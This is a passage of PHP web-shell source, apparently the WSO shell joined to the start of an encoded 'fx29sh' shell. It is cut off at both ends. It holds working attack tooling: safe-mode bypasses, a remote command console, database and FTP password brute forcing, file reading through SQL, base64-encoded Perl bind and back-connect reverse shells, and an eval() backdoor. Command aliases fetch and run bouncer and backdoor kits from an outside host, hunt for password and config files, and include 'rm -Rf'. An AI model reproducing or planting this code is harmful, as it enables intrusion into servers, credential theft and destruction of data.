type=submit value=">>"></form>';break;case 'touch':if(!empty($_POST['p3'])){$time=strtotime($_POST['p3']);if($time){if(!touch($_POST['p1'],$time,$time))echo 'Fail!';else echo 'Touched!';}else echo 'Bad time format!';}clearstatcache();echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s",@filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';break;}echo '</div>';wsoFooter();}function actionSafeMode(){$temp='';ob_start();switch($_POST['p1']){case 1 :$temp=@tempnam($test,'cx');if(@copy("compress.zlib://".$_POST['p2'],$temp)){echo @file_get_contents($temp);unlink($temp);}else echo 'Sorry... Can\'t open file';break;case 2 :$files=glob($_POST['p2'].'*');if(is_array($files))foreach($files as $filename)echo $filename."\n";break;case 3 :$ch=curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!','',__FILE__));curl_exec($ch);break;case 4 :ini_restore("safe_mode");ini_restore("open_basedir");include ($_POST['p2']);break;case 5 :for(;$_POST['p2']<=$_POST['p3'];$_POST['p2']++){$uid=@posix_getpwuid($_POST['p2']);if($uid)echo join(':',$uid)."\n";}break;}$temp=ob_get_clean();wsoHeader();echo '<h1>Safe mode bypass</h1><div class=content>';echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';if($temp)echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';echo '</div>';wsoFooter();}function actionConsole(){if(!empty($_POST['p1']) && !empty($_POST['p2'])){$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']=true;$_POST['p1'].=' 2>&1';}elseif(!empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']=false;if(isset($_POST['ajax'])){$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;ob_start();echo "d.cf.cmd.value='';\n";$temp=@iconv($_POST['charset'],'UTF-8',addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){if(@chdir($match[1 ])){$GLOBALS['cwd']=@getcwd();echo "c_='".$GLOBALS['cwd']."';";}}echo "d.cf.output.value+='".$temp."';";echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";$temp=ob_get_clean();echo strlen($temp),"\n",$temp;exit;}wsoHeader();echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push('');
	cur = cmds.length-1;
}

</script>";echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';foreach($GLOBALS['aliases'] as $n=>$v){if($v==''){echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';continue;}echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';}if(empty($_POST['ajax']) && !empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2']) || $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';if(!empty($_POST['p1'])){echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));}echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';echo '</form></div><script>d.cf.cmd.focus();</script>';wsoFooter();}function actionLogout(){session_destroy();die('bye!');}function actionSelfRemove(){if($_POST['p1']=='yes')if(@unlink(preg_replace('!\(\d+\)\s.*!','',__FILE__)))die('Shell has been removed');else echo 'unlink error!';if($_POST['p1']!='yes')wsoHeader();echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';wsoFooter();}function actionBruteforce(){wsoHeader();if(isset($_POST['proto'])){echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';if($_POST['proto']=='ftp'){function bruteForce($ip,$port,$login,$pass){$fp=@ftp_connect($ip,$port?$port:21 );if(!$fp)return false;$res=@ftp_login($fp,$login,$pass);@ftp_close($fp);return $res;}}elseif($_POST['proto']=='mysql'){function bruteForce($ip,$port,$login,$pass){$res=@mysql_connect($ip.':'.$port?$port:3306 ,$login,$pass);@mysql_close($res);return $res;}}elseif($_POST['proto']=='pgsql'){function bruteForce($ip,$port,$login,$pass){$str="host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";$res=@pg_connect($str);@pg_close($res);return $res;}}$success=0 ;$attempts=0 ;$server=explode(":",$_POST['server']);if($_POST['type']==1 ){$temp=@file('/etc/passwd');if(is_array($temp))foreach($temp as $line){$line=explode(":",$line);++$attempts;if(bruteForce(@$server[0 ],@$server[1 ],$line[0 ],$line[0 ])){$success++;echo '<b>'.htmlspecialchars($line[0 ]).'</b>:'.htmlspecialchars($line[0 ]).'<br>';}if(@$_POST['reverse']){$tmp="";for($i=strlen($line[0 ])-1 ;$i>=0 ;--$i)$tmp.=$line[0 ][$i];++$attempts;if(bruteForce(@$server[0 ],@$server[1 ],$line[0 ],$tmp)){$success++;echo '<b>'.htmlspecialchars($line[0 ]).'</b>:'.htmlspecialchars($tmp);}}}}elseif($_POST['type']==2 ){$temp=@file($_POST['dict']);if(is_array($temp))foreach($temp as $line){$line=trim($line);++$attempts;if(bruteForce($server[0 ],@$server[1 ],$_POST['login'],$line)){$success++;echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';}}}echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";}echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'.'<span>Server:port</span></td>'.'<td><input type=text name=server value="127.0.0.1"></td></tr>'.'<tr><td><span>Brute type</span></td>'.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'.'<td><input type=text name=login value="root"></td></tr>'.'<tr><td><span>Dictionary</span></td>'.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';echo '</div><br>';wsoFooter();}function actionSql(){class DbClass{var $type;var $link;var $res;function DbClass($type){$this->type=$type;}function connect($host,$user,$pass,$dbname){switch($this->type){case 'mysql':if($this->link=@mysql_connect($host,$user,$pass,true))return true;break;case 'pgsql':$host=explode(':',$host);if(!$host[1 ])$host[1 ]=5432 ;if($this->link=@pg_connect("host={$host[0 ]} port={$host[1 ]} user=$user password=$pass dbname=$dbname"))return true;break;}return false;}function selectdb($db){switch($this->type){case 'mysql':if(@mysql_select_db($db))return true;break;}return false;}function query($str){switch($this->type){case 'mysql':return $this->res=@mysql_query($str);break;case 'pgsql':return $this->res=@pg_query($this->link,$str);break;}return false;}function fetch(){$res=func_num_args()?func_get_arg(0 ):$this->res;switch($this->type){case 'mysql':return @mysql_fetch_assoc($res);break;case 'pgsql':return @pg_fetch_assoc($res);break;}return false;}function listDbs(){switch($this->type){case 'mysql':return $this->query("SHOW databases");break;case 'pgsql':return $this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");break;}return false;}function listTables(){switch($this->type){case 'mysql':return $this->res=$this->query('SHOW TABLES');break;case 'pgsql':return $this->res=$this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");break;}return false;}function error(){switch($this->type){case 'mysql':return @mysql_error();break;case 'pgsql':return @pg_last_error();break;}return false;}function setCharset($str){switch($this->type){case 'mysql':if(function_exists('mysql_set_charset'))return @mysql_set_charset($str,$this->link);else $this->query('SET CHARSET '.$str);break;case 'pgsql':return @pg_set_client_encoding($this->link,$str);break;}return false;}function loadFile($str){switch($this->type){case 'mysql':return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));break;case 'pgsql':$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");$r=array();while($i=$this->fetch())$r[]=$i['file'];$this->query('drop table wso2');return array('file'=>implode("\n",$r));break;}return false;}function dump($table,$fp=false){switch($this->type){case 'mysql':$res=$this->query('SHOW CREATE TABLE `'.$table.'`');$create=mysql_fetch_array($res);$sql=$create[1 ].";\n";if($fp)fwrite($fp,$sql);else echo ($sql);$this->query('SELECT * FROM `'.$table.'`');$head=true;while($item=$this->fetch()){$columns=array();foreach($item as $k=>$v){if($v==null)$item[$k]="NULL";elseif(is_numeric($v))$item[$k]=$v;else $item[$k]="'".@mysql_real_escape_string($v)."'";$columns[]="`".$k."`";}if($head){$sql='INSERT INTO `'.$table.'` ('.implode(", ",$columns).") VALUES \n\t(".implode(", ",$item).')';$head=false;}else $sql="\n\t,(".implode(", ",$item).')';if($fp)fwrite($fp,$sql);else echo ($sql);}if(!$head)if($fp)fwrite($fp,";\n\n");else echo (";\n\n");break;case 'pgsql':$this->query('SELECT * FROM '.$table);while($item=$this->fetch()){$columns=array();foreach($item as $k=>$v){$item[$k]="'".addslashes($v)."'";$columns[]=$k;}$sql='INSERT INTO '.$table.' ('.implode(", ",$columns).') VALUES ('.implode(", ",$item).');'."\n";if($fp)fwrite($fp,$sql);else echo ($sql);}break;}return false;}};$db=new DbClass($_POST['type']);if(@$_POST['p2']=='download'){$db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base']);$db->selectdb($_POST['sql_base']);switch($_POST['charset']){case "Windows-1251":$db->setCharset('cp1251');break;case "UTF-8":$db->setCharset('utf8');break;case "KOI8-R":$db->setCharset('koi8r');break;case "KOI8-U":$db->setCharset('koi8u');break;case "cp866":$db->setCharset('cp866');break;}if(empty($_POST['file'])){ob_start("ob_gzhandler",4096 );header("Content-Disposition: attachment; filename=dump.sql");header("Content-Type: text/plain");foreach($_POST['tbl'] as $v)$db->dump($v);exit;}elseif($fp=@fopen($_POST['file'],'w')){foreach($_POST['tbl'] as $v)$db->dump($v,$fp);fclose($fp);unset($_POST['p2']);}else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');}wsoHeader();echo "

<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
<td><select name='type'><option value='mysql' ";if(@$_POST['type']=='mysql')echo 'selected';echo ">MySql</option><option value='pgsql' ";if(@$_POST['type']=='pgsql')echo 'selected';echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='".(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']))."'></td>
<td><input type=text name=sql_login value='".(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']))."'></td>
<td><input type=text name=sql_pass value='".(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']))."'></td><td>";$tmp="<input type=text name=sql_base value='".(empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base']))."'>";if(isset($_POST['sql_host'])){if($db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base'])){switch($_POST['charset']){case "Windows-1251":$db->setCharset('cp1251');break;case "UTF-8":$db->setCharset('utf8');break;case "KOI8-R":$db->setCharset('koi8r');break;case "KOI8-U":$db->setCharset('koi8u');break;case "cp866":$db->setCharset('cp866');break;}$db->listDbs();echo "<select name=sql_base><option value=''></option>";while($item=$db->fetch()){list($key,$value)=each($item);echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';}echo '</select>';}else echo $tmp;}else echo $tmp;echo "</td>

				<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'".(empty($_POST['sql_count'])?'':' checked')."> count the number of rows</td>
			</tr>
		</table>
		<script>
            s_db='".@addslashes($_POST['sql_base'])."';
            function fs(f) {
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
                    if(f.p1) f.p1.value='';
                    if(f.p2) f.p2.value='';
                    if(f.p3) f.p3.value='';
                }
            }
			function st(t,l) {
				d.sf.p1.value = 'select';
				d.sf.p2.value = t;
                if(l && d.sf.p3) d.sf.p3.value = l;
				d.sf.submit();
			}
			function is() {
				for(i=0;i<d.sf.elements['tbl[]'].length;++i)
					d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
			}
		</script>";if(isset($db) && $db->link){echo "<br/><table width=100% cellpadding=2 cellspacing=0>";if(!empty($_POST['sql_base'])){$db->selectdb($_POST['sql_base']);echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";$tbls_res=$db->listTables();while($item=$db->fetch($tbls_res)){list($key,$value)=each($item);if(!empty($_POST['sql_count']))$n=$db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));$value=htmlspecialchars($value);echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>")."</nobr><br>";}echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";if(@$_POST['p1']=='select'){$_POST['p1']='query';$_POST['p3']=$_POST['p3']?$_POST['p3']:1 ;$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);$num=$db->fetch();$pages=ceil($num['n']/30 );echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2']."\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int)$_POST['p3']).">";echo " of $pages";if($_POST['p3']>1 )echo " <a href=# onclick='st(\"".$_POST['p2'].'", '.($_POST['p3']-1 ).")'>&lt; Prev</a>";if($_POST['p3']<$pages)echo " <a href=# onclick='st(\"".$_POST['p2'].'", '.($_POST['p3']+1 ).")'>Next &gt;</a>";$_POST['p3']--;if($_POST['type']=='pgsql')$_POST['p2']='SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30 );else $_POST['p2']='SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30 ).',30';echo "<br><br>";}if((@$_POST['p1']=='query') && !empty($_POST['p2'])){$db->query(@$_POST['p2']);if($db->res!==false){$title=false;echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';$line=1 ;while($item=$db->fetch()){if(!$title){echo '<tr>';foreach($item as $key=>$value)echo '<th>'.$key.'</th>';reset($item);$title=true;echo '</tr><tr>';$line=2 ;}echo '<tr class="l'.$line.'">';$line=$line==1 ?2 :1 ;foreach($item as $key=>$value){if($value==null)echo '<td><i>null</i></td>';else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';}echo '</tr>';}echo '</table>';}else {echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';}}echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";if(!empty($_POST['p2']) && ($_POST['p1']!='loadfile'))echo htmlspecialchars($_POST['p2']);echo "</textarea><br/><input type=submit value='Execute'>";echo "</td></tr>";}echo "</table></form><br/>";if($_POST['type']=='mysql'){$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");if($db->fetch())echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>";}if(@$_POST['p1']=='loadfile'){$file=$db->loadFile($_POST['p2']);echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';}}else {echo htmlspecialchars($db->error());}echo '</div>';wsoFooter();}function actionNetwork(){wsoHeader();$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";echo "<h1>Network tools</h1><div class=content>

	<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">
	<span>Bind port to /bin/sh [perl]</span><br/>
	Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
	</form>
	<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">
	<span>Back-connect  [perl]</span><br/>
	Server: <input type='text' name='server' value='".$_SERVER['REMOTE_ADDR']."'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>

	</form><br>";if(isset($_POST['p1'])){function cf($f,$t){$w=@fopen($f,"w") or @function_exists('file_put_contents');if($w){@fwrite($w,@base64_decode($t));@fclose($w);}}if($_POST['p1']=='bpp'){cf("/tmp/bp.pl",$bind_port_p);$out=wsoEx("perl /tmp/bp.pl ".$_POST['p2']." 1>/dev/null 2>&1 &");echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bp.pl")."</pre>";unlink("/tmp/bp.pl");}if($_POST['p1']=='bcp'){cf("/tmp/bc.pl",$back_connect_p);$out=wsoEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");echo "<pre class=ml1>$out\n".wsoEx("ps aux | grep bc.pl")."</pre>";unlink("/tmp/bc.pl");}}echo '</div>';wsoFooter();}function actionRC(){if(!@$_POST['p1']){$a=array("uname"=>php_uname(),"php_version"=>phpversion(),"wso_version"=>WSO_VERSION,"safemode"=>@ini_get('safe_mode'));echo serialize($a);}else {eval($_POST['p1']);}}if(empty($_POST['a'])){if(isset($default_action) && function_exists('action'.$default_action)){$_POST['a']=$default_action;}else {$_POST['a']='SecInfo';}}if(!empty($_POST['a']) && function_exists('action'.$_POST['a']) && empty($_GET['a'])){call_user_func('action'.$_POST['a']);}if(!empty($_GET['a']) && function_exists('action'.$_GET['a'])){$_POST['a']=$_GET['a'];$_POST['c']=isset($_GET['c'])?$_GET['c']:$GLOBALS['cwd'];$_POST['p1']=isset($_GET['p1'])?$_GET['p1']:'';$_POST['p2']=isset($_GET['p2'])?$_GET['p2']:'';$_POST['p3']=isset($_GET['p3'])?$_GET['p3']:'';$_POST['charset']=isset($_GET['charset'])?$_GET['charset']:'';call_user_func('action'.$_GET['a']);}function FetchURL($url){$ch=curl_init();curl_setopt($ch,CURLOPT_USERAGENT,"$cheader");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1 );curl_setopt($ch,CURLOPT_HEADER,false);curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1 );curl_setopt($ch,CURLOPT_TIMEOUT,30 );$data=curl_exec($ch);if(!$data){return false;}return $data;}exit;"));
 }else if(isset($_GET["f29"])){ 
eval(base64_decode("define('sh_ver',"3.3.05.09");error_reporting(E_ALL);error_reporting(E_ERROR|E_PARSE);define("starttime",getmicrotime());$sh_mainurl='http://feelcomz.co.cc/';$fx29sh_updateurl=$sh_mainurl."fx29sh_update.php";$fx29sh_sourcesurl=$sh_mainurl."fx29sh.txt";$sh_sourcez=array("Fx29Sh"=>array($sh_mainurl."shellz/cyberz.txt","fx29sh.php"),"psyBNC"=>array($sh_mainurl."toolz/fx.tgz","fx.tgz"),"Eggdrop"=>array($sh_mainurl."toolz/fxb.tgz","fxb.tgz"),"BindDoor"=>array($sh_mainurl."toolz/bind.tgz","bind.tgz"),);$auth=array("login"=>"","pass"=>"","md5pass"=>"","hostallow"=>array("*"),"denied"=>"<a href=\"$sh_mainurl\">".sh_name()."</a>: access denied!",);$tmp_dir="";$sess_cookie="fx29shcook";$sort_default="0a";$sort_save=TRUE;$copy_unset=FALSE;$gzipencode=TRUE;$filestealth=TRUE;$hexdump_lines=8 ;$hexdump_rows=24 ;$auto_surl=TRUE;if(!is_windows()){$cmdaliases=array(array("List Directory","ls -al"),array("Find all suid files","find / -type f -perm -04000 -ls"),array("Find suid files in current dir","find . -type f -perm -04000 -ls"),array("Find all sgid files","find / -type f -perm -02000 -ls"),array("Find sgid files in current dir","find . -type f -perm -02000 -ls"),array("Find config.inc.php files","find / -type f -name config.inc.php"),array("Find config* files","find / -type f -name \"config*\""),array("Find config* files in current dir","find . -type f -name \"config*\""),array("Find all writable folders and files","find / -perm -2 -ls"),array("Find all writable folders and files in current dir","find . -perm -2 -ls"),array("Find all writable folders","find / -type d -perm -2 -ls"),array("Find all writable folders in current dir","find . -type d -perm -2 -ls"),array("Find all service.pwd files","find / -type f -name service.pwd"),array("Find service.pwd files in current dir","find . -type f -name service.pwd"),array("Find all .htpasswd files","find / -type f -name .htpasswd"),array("Find .htpasswd files in current dir","find . -type f -name .htpasswd"),array("Find all .bash_history files","find / -type f -name .bash_history"),array("Find .bash_history files in current dir","find . -type f -name .bash_history"),array("Find all .fetchmailrc files","find / -type f -name .fetchmailrc"),array("Find .fetchmailrc files in current dir","find . -type f -name .fetchmailrc"),array("List file attributes on a Linux second extended file system","lsattr -va"),array("Show opened ports","netstat -an | grep -i listen"),array("-----",""),array("Logged in users","w"),array("Last connect","lastlog"),array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),array("Inet Address","/sbin/ifconfig | grep inet"),array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),array("CPU Info","cat /proc/version /proc/cpuinfo"),array("Is gcc installed ?","locate gcc"),array("Format box (DANGEROUS)","rm -Rf"),array("-----",""),array("wget & run psyBNC","wget ".$sh_sourcez["psyBNC"][0 ].";tar -zxf ".$sh_sourcez["psyBNC"][1 ].";cd .fx;./config 29110;./fuck;./run"),array("wget & extract EggDrop","wget ".$sh_sourcez["Eggdrop"][0 ].";tar -zxf ".$sh_sourcez["psyBNC"][1 ]),array("wget & run BindDoor","wget ".$sh_sourcez["BindDoor"][0 ].";tar -zxvf ".$sh_sourcez["BindDoor"][1 ].";./bind"),array("-----",""),array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),);}else {$cmdaliases=array(array("List Directory","dir"),array("Find index.php in current dir","dir /s /w /b index.php"),array("Find *config*.php in current dir","dir /s /w /b *config*.php"),array("Find c99shell in current dir","find /c \"c99\" *"),array("Find r57shell in current dir","find /c \"r57\" *"),array("Find fx29shell in current dir","find /c \"fx29\" *"),array("Show active connections","netstat -an"),array("Show running services","net start"),array("User accounts","net user"),array("Show computers","net view"),);}$phpfsaliases=array(array("Read File","read",1 ,"File",""),array("Write File (PHP5)","write",2 ,"File","Text"),array("Copy","copy",2 ,"From","To"),array("Rename/Move","rename",2 ,"File","To"),array("Delete","delete",1 ,"File",""),array("Make Dir","mkdir",1 ,"Dir",""),array("Download","download",2 ,"URL","To"),array("Download (Binary Safe)","downloadbin",2 ,"URL","To"),array("Change Perm (0755)","chmod",2 ,"File","Perms"),array("Find Writable Dir","fwritabledir",2 ,"Dir","Max"),array("Find Pathname Pattern","glob",2 ,"Dir","Pattern"),);if(!function_exists("posix_getpwuid")){function posix_getpwuid($uid){return FALSE;}}if(!function_exists("posix_getgrgid")){function posix_getgrgid($gid){return FALSE;}}if(!function_exists("posix_kill")){function posix_kill($gid){return FALSE;}}@set_time_limit(0 );@ini_set("max_execution_time",0 );@ignore_user_abort(TRUE);@set_magic_quotes_runtime(0 );if(get_magic_quotes_gpc())strips($GLOBALS);$_REQUEST=array_merge($_COOKIE,$_GET,$_POST);$d=@$_REQUEST["d"];$f=@$_REQUEST["f"];@extract($_REQUEST["fx29shcook"]);foreach($_REQUEST as $k=>$v){if(!isset($$k)){$$k=$v;}}if($auto_surl){$include="&";foreach(explode("&",getenv("QUERY_STRING")) as $v){$v=explode("=",$v);$name=urldecode($v[0 ]);$value=@urldecode($v[1 ]);$needles=array("http://","https://","ssl://","ftp://","\\\\");foreach($needles as $needle){if(strpos($value,$needle)===0 ){$includestr.=urlencode($name)."=".urlencode($value)."&";}}}}if(empty($surl))$surl=htmlspecialchars("?".@$includestr);$img_tag='<img 